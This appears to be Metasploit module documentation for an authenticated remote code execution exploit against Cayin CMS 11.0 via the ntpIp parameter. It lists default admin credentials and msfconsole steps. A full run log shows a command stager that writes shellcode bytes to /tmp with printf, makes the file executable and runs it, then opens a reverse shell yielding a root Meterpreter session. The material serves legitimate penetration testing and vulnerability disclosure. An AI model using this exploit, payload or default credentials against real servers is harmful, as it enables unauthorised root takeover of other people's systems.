## Vulnerable Application This module exploits an authenticated RCE in Cayin CMS <= 11.0. The RCE is executed in the `system_service.cgi` file's `ntpIp` Parameter. The field is limited in size, so repeated requests are made to achieve a larger payload. Cayin CMS-SE is built for Ubuntu 16.04 (20.04 failed to install correctly), so the environment should be pretty set and not dynamic between targets. Results in root level access. With CMS-SE's UI there are several options for NTP server. 1. Test (this runs the RCE 3 times, thus is exploitable, a different strategy like `wget` would be required) 2. Save (saves the data, but doesn't run it) 3. Update (what was used in this exploit) Default authentication for the system is administrator:admin from [Guide](http://onlinehelp.cayintech.com/cmsServer/MCS110EN-01/Web_Manager.html) ## Verification Steps 1. Install the application on Ubuntu 16.04 2. Start msfconsole 3. Do: ```exploits/linux/http/cayin_cms_ntp``` 4. Do: ```set rhosts [ip]``` 5. Do: ```run``` 6. You should get a root shell. ## Options ## Scenarios ### Cayin CMS-SE 11.0 build 19071 on Ubuntu 16.04 ``` [*] Processing cayin_cms.rb for ERB directives. resource (cayin_cms.rb)> use exploits/linux/http/cayin_cms_ntp resource (cayin_cms.rb)> set rhosts 2.2.2.2 rhosts => 2.2.2.2 resource (cayin_cms.rb)> set lhost 1.1.1.1 lhost => 1.1.1.1 resource (cayin_cms.rb)> set lport 6666 lport => 6666 resource (cayin_cms.rb)> set verbose true verbose => true resource (cayin_cms.rb)> check [+] Cayin CMS install detected [*] 2.2.2.2:80 - The service is running, but could not be validated. resource (cayin_cms.rb)> exploit [*] Started reverse TCP handler on 1.1.1.1:6666 [+] Cayin CMS install detected [*] Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\317\\0\\0\\0\\112\\1\\0\\0'>>/tmp/TCKAi", "printf '\\7\\0\\0\\0\\0\\20\\0\\0\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150\\300\\250\\2\\307\\150\\2\\0\\32\\12\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200'>>/tmp/TCKAi", "printf '\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300\\170'>>/tmp/TCKAi", "printf '\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/TCKAi ; chmod +x /tmp/TCKAi ; /tmp/TCKAi"] [*] Command Stager progress - 26.60% done (199/748 bytes) [*] Command Stager progress - 53.07% done (397/748 bytes) [*] Command Stager progress - 79.81% done (597/748 bytes) [*] Transmitting intermediate stager...(106 bytes) [*] Sending stage (980808 bytes) to 2.2.2.2 [*] Meterpreter session 1 opened (1.1.1.1:6666 -> 2.2.2.2:57446) at 2020-06-12 10:30:21 -0400 [*] Command Stager progress - 100.00% done (748/748 bytes) meterpreter > getuid Server username: no-user @ CMS-SE (uid=0, gid=1001, euid=0, egid=1001) meterpreter > sysinfo Computer : CMS-SE OS : Ubuntu 16.04 (Linux 4.4.0-179-generic) Architecture : x64 BuildTuple : i486-linux-musl Meterpreter : x86/linux ```